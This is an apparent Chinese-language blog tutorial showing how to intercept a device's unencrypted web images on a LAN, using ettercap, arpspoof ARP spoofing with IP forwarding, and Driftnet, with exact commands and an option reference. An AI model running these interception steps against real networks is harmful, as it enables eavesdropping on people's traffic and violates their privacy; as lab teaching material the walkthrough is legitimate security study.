安全工具—Driftnet与ARP欺骗的结合应用



什么是ARP协议?

Address Resolution Protocol (地址解析协议):地址解析协议是一种通信协议,用于查询与给定互联网层地址(通常是IPv4地址)相关联的链路层地址(如MAC地址)。这种映射是Internet协议簇中的一个关键功能。

什么是ARP欺骗?

地址解析协议欺骗(ARP欺骗)是一种攻击形式,攻击者通过使用伪造的ARP请求和应答数据包更改目标计算机的ARP缓存,从而更改媒体访问控制(MAC)地址并攻击以太网LAN。

Driftnet介绍:

Driftnet工具:Driftnet监视网络流量,抓取网络流量中的JPEG和GIF图像。这侵犯了人们的隐私,无论何时何地我们都不能这么做。除此之外,它还可以从网络中提取MPEG音频数据。


实际操作ARP欺骗和在Kali Linux中使用Driftnet工具。

1. 打开kali linux终端

开启Ettercap扫描主机
输入命令:sudo ettercap -G
在这里选择你要使用的网卡,我的是有线所以是eth0,如果你是无线网卡则为wlan0。
这里我已经提前知道了靶机ip地址,所以接下来我直接测试是否连通,如果你不知道,则需要进一步判断,在ifconfig命令下可以查看网关地址,也可以称为路由器地址。

2. 打开新的kali linux终端

测试主机是否连通
输入命令:ping 10.0.0.221

3.开始执行ARP欺骗

输入命令:sudo arpspoof -i eth0 -t 10.0.0.221 10.0.0.1
如果没有开启端口转发,靶机会断网。

4. 现在是开启端口转发的时候了,这样就不会出现拒绝服务的情况。

输入命令检查端口转发是否启用:
cat /proc/sys/net/ipv4/ip_forward
#如果返回值为0则是关闭状态
#如果返回值为1则是开启状态

开启端口转发服务

echo 1 > /proc/sys/net/ipv4/ip_forward

5. 由于在目标计算机中启用了ARP欺骗。现在就是Driftnet大展身手的时候了

输入命令:sudo driftnet -i eth0

6.现在我们打开一个没有SSL证书的网站,这里拿某中学网站做例子

我们可以看到,图片已经抓到了。

7.抓取并保存图片到指定目录

输入命令:sudo driftnet -i eth0 -d /home/evil0ctal/pic
#这里可能需要你创建一个文件夹或者选择一个可用的文件夹地址
#我在/home/evil0ctal 里创建了pic文件夹,所以目录地址为/home/evil0ctal/pic

总结

到这里,基本的Driftnet使用已经结束了,目前没有测试带有SSL加密的网站,靶机是iPhone所以不好截图,下面是 Driftnet 的常用指令,理论上讲, 也可以使用driftnet从网络捕获MPEG音频数据,然后通过诸如mpg123的播放器进行播放。

参数命令
-b :捕获到新的图片时发出嘟嘟声(beep)

-i :选择监听接口(interface )

-f :读取一个指定pcap数据包中的图片(file)

-p :不让所监听的接口使用混杂模式(promiscuous mode)

-a :后台模式:将捕获的图片保存到目录中(Adjunct mode,不会显示在屏幕上)

-m :指定保存图片数的数目(number)

-d :指定保存图片的路径(dirctory)

-x :指定保存图片的前缀名(prefix)
  • 分享:
评论
还没有评论
    发表评论 说点什么